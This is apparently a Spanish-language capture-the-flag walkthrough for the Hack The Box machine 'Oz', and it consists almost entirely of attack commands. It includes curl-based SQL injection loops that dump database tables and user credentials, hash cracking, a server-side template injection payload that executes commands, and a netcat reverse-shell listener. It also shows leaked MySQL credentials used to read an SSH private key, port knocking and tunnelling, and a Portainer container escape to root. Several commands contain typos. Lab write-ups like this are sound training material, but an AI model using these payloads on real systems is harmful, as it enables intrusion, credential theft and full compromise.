nmap -A -p- -oA oz 10.129.29.198 --min-rate=10000 --script=vuln --script-timeout=15 -v

nmap -sC -sV -O -p- -oA oz 10.129.29.198

nmap -sU -O -p- -oA oz-udp 10.129.29.198

nikto -h 10.129.29.198:80

Pasted image 20220325063127.png

Pasted image 20220325063319.png

whatweb http://10.129.29.198

whatweb http://10.129.29.198:8080

Pasted image 20220325063707.png

Nos dirigimos a http://10.129.29.198

Pasted image 20220325063811.png

Nos dirigimos a http://10.129.29.198:8080

Pasted image 20220325063838.png

Vemos http://10.129.29.198/robots.txt

Pasted image 20220325063949.png

Pasted image 20220325064227.png

Pasted image 20220325064400.png

Vamos a http://10.129.29.198/users/admin

Pasted image 20220325064521.png

curl -s -X GET "http://10.129.29.198/users/%20union%20select%20version()--%20-"

Pasted image 20220325064858.png

clear; for i in $(seq 0 10); do echo "[+] Table [$i]ozdb]: $(curl -s -X GET http://10.129.29.198/users/%20union%20select%20table_name%20from%20information_schema.tables%20where%20table_schema-\"ozdb\"%20limit%20$i,1--%20-" | jq '.["username"]':)";done

Pasted image 20220325071633.png

clear; for i in $(seq 0 10); do echo "[+] column [$i]ozdb][users_gbw]: $(curl -s -X GET http://10.129.29.198/users/%20union%20select%20column_name%20from%20information_schema.columns%20where%20table_schema-\"ozdb\"%20limit%20$i,1--%20-" | jq '.["username"]':)";done

Pasted image 20220325071846.png

clear; for i in $(seq 0 10); do echo "[+] credentials [$i]ozdb]: $(curl -s -X GET http://10.129.29.198/users/%20union%20select%20group_contact(username,0x3a,password)%20from%20ozdb.users_gbw%20limit%20$i,1--%20-" | jq '.["username"]')";done

Pasted image 20220325072417.png

Metemos y modificamos las credenciales. Creamos un archivo llamado data.

cat data | tr ',' '\n' > hashes

cat hashes

john --wordlist=/usr/share/wordlists/rockyou.txt hashes

Pasted image 20220325072803.png

hashcat --example-hashes | grep "PBKDF2-HMAC-SHA256" -C 2

Pasted image 20220325074225.png

Trate de usar hashcat y no me funciono.

hashcat -m 10900 hashes /us/share/wordlists/rockyou.txt

Pasted image 20220325080006.png

Credenciales-> wizard.oz:wizardofoz22

Pasted image 20220325081327.png

Nos logeamos en http://10.129.29.198:8080/login

Pasted image 20220325082605.png

Vemos un sistema de tiquetes.

Pasted image 20220325083012.png

Y vemos la parte https://github.com/swisskyrepo/PayloadsAllTheThings/tree/master/Server%20Side%20Template%20Injection#exploit-the-ssti-by-writing-an-evil-config-file

Agregamos esto en burpsuite.

{{ ''.class.mro[2].subclasses()40.write('from subprocess import check_output\n\nRUNCMD = check_output\n') }}

{{ config.from_pyfile('/tmp/evilconfig.cfg') }}

{{ config'RUNCMD' }}

Pasted image 20220325084906.png

Lo modificamos para que podamos hacer un reverse shell:

Pasted image 20220325085441.png

rlwrap nc -lvnp 443

Pasted image 20220325085758.png

Nos damos cuenta que estamos en un contenedor

Pasted image 20220325090624.png

cd /.secret

cat knockd.conf

Pasted image 20220325090930.png

Vemos las credenciales en start.sh

Pasted image 20220325094100.png

mysql -udorthi -pN0Pl4c3L1keH0me -h 10.100.10.4 -e "show tables" mysql

mysql -udorthi -pN0Pl4c3L1keH0me -h 10.100.10.4 -e "select User,Password from user" mysql

mysql -udorthi -pN0Pl4c3L1keH0me -h 10.100.10.4 -e "select passwor('N0Pl4c3L1keH0me')" mysql

Pasted image 20220325095949.png

mysql -udorthi -pN0Pl4c3L1keH0me -h 10.100.10.4 -e "select load_file('home/dorthi/.ssh/id_rsa')" mysql

Pasted image 20220325100209.png

Copiamos y hacemos modificaciones al id_rsa.

cat id_rsa | sed 's/\\n/\n/g' | sponge id_rsa

Pasted image 20220325100711.png

/usr/share/john/ssh2john.py id_rsa > hash

john --wordlist=/usr/share/wordlists/rockyou.txt hash

Pasted image 20220325102337.png

Creamos un archivo credentials.txt con las credenciales que habiamos encontrado.

john --wordlist=credentials.txt hash

Pasted image 20220325102423.png

for port in 40809 50212 46969; do echo "test" | nc -u -w 1 10.129.29.198 $port; done; ssh -i id_rsa dorthi@10.129.29.198

Pasted image 20220325102543.png

nmap -p- --open -T5 -v -n 172.17.0.2

nmap -sCV -p9000 172.17.0.2

Pasted image 20220325103900.png

Hacemos un port forward

  1. enter
  2. ~C
  3. ssh> prompt, -L 9000:172.17.0.2:9000

Pasted image 20220325111939.png

Seguimos las instrucciones:

Pasted image 20220325112049.png

http "http://localhost:9000/api/auth" Username="admin" Password="password"

Pasted image 20220325112416.png

http "http://localhost:9000/api/users/admin/init" Username="admin" Password="password"

http "http://localhost:9000/api/auth" Username="admin" Password="password"

Pasted image 20220325112640.png

Nos dirigimos al menu y creamos un contenedor nuevo con la configuracion adecuada.

Pasted image 20220325113330.png

Nos dirigimos a la pestana Volumes y hacemos la siguiente configuracion:

Pasted image 20220325113458.png

Le damos click a >_console

Pasted image 20220325114124.png

Escogemos /bin/sh y le damos click a connect

cd rootfs

cd root && cat root.txt

Pasted image 20220325114057.png

boxes

copyright©2022 Cu3rv0x all rights reserved